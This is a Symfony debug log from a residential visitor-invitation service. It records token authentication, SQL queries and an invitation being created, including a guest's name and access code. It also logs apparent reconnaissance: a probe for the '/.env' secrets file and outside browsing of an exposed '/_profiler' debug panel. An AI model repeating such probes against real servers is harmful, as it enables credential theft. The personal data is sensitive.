[2025-12-16 01:00:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:09] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:09] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:09] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:09] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:09] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:09] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:09] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:09] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 01:00:27] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-16 01:00:27] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:27] security.DEBUG: Cannot refresh token because user has changed. {"username":"","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-16 01:00:27] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-16 01:00:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 01:00:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:27] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [394,270,1] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["8521ca3b-69bb-4665-9c69-25 [...]"] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [394,270,1] []
[2025-12-16 01:00:27] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 01:00:27] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"4a4e7a8a-6105-4bbf-b50c-0a [...]","2":1,"3":"2025-12-16 01:00:27","4":"2025-12-16 01:00:27","5":"Marisol","6":"Romero","7":"546349","8":"/invitation/b5a36dda6387f7 [...]","9":"1","10":null,"11":"2025-12-16 06:00:00","12":null,"13":null,"14":null,"15":270,"16":394} []
[2025-12-16 01:00:27] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [270] []
[2025-12-16 01:00:27] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 01:00:27] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"30","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a41ce4c3-29d5-4f1f-9146-ae339979667c/invitation/30/0?order=desc","method":"GET"} []
[2025-12-16 01:00:27] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:27] security.DEBUG: Cannot refresh token because user has changed. {"username":"","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-16 01:00:27] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-16 01:00:27] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 01:00:27] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["9981ff30bf4dfeecd417d0c922 [...]"] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:27] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [394,270,1] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 30 OFFSET 0 [270,1] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [270,1] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 01:00:27] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
[2025-12-16 01:00:27] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 01:02:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 01:02:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-16 01:04:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d21a97","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d21a97","method":"GET"} []
[2025-12-16 01:04:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 01:06:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=twig","method":"GET"} []
[2025-12-16 01:06:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 01:22:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+(e.settings.url||"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+(e.settings.url||\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 01:26:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 01:26:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 01:26:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:26:02] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:26:02] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 01:26:02] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 01:26:02] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 01:26:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+o.source2+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+o.source2+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 01:29:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+o.poster+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+o.poster+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 01:34:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+i.url+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+i.url+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 01:40:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+o.source1+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+o.source1+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 01:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/$1"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/$1\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 01:46:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 01:46:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"266eb6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/266eb6","method":"GET"} []
[2025-12-16 01:46:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 01:46:32] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"266eb6","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/266eb6/search/results?ip=46.101.9.216&limit=10","method":"GET"} []
[2025-12-16 01:46:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=46.101.9.216&limit=10","method":"GET"} []
[2025-12-16 01:46:32] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://unda.co/_profiler/search?limit=10","method":"GET"} []
[2025-12-16 01:46:33] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"266eb6","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/266eb6/search/results?limit=10","method":"GET"} []
[2025-12-16 01:46:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?limit=10","method":"GET"} []
[2025-12-16 01:46:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest","method":"GET"} []
[2025-12-16 01:46:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 01:46:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"266eb6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/266eb6?panel=request","method":"GET"} []
[2025-12-16 01:46:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 01:46:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"266eb6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/266eb6?panel=time","method":"GET"} []
[2025-12-16 01:46:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 01:49:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 01:49:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 01:49:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:49:13] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 01:49:13] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 01:49:13] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 01:49:13] security.DEBUG: Calling Authentication entry point. [] []
